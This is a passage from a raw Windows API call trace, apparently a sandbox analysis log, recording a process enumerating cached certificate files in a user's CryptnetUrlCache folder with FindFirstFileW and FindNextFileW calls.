nFileSizeLow=0x5ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0057.605] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0057.605] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0057.605] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0057.605] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0057.606] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0057.606] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x0, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0057.606] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x64b, dwReserved0=0x0, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0057.606] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0x0, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0057.606] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0x0, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0057.606] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0x0, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0057.606] FindClose (in: hFindFile=0x6c4468 | out: hFindFile=0x6c4468) returned 1 [0057.606] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.606] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0057.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4468 [0057.607] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.607] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0x0, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0057.607] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x166, dwReserved0=0x0, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0057.607] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0057.607] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0057.608] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0x0, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0057.608] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0057.608] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0x0, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0057.608] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0x0, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0057.608] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0057.608] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0057.608] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0057.609] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0x0, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0057.609] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0057.609] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0057.609] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0057.609] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0x0, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0057.609] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0057.609] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd48e2bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0057.610] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0057.610] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0057.611] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0057.611] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0057.611] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x611ea800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x611ea800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5836df00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5836df00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", 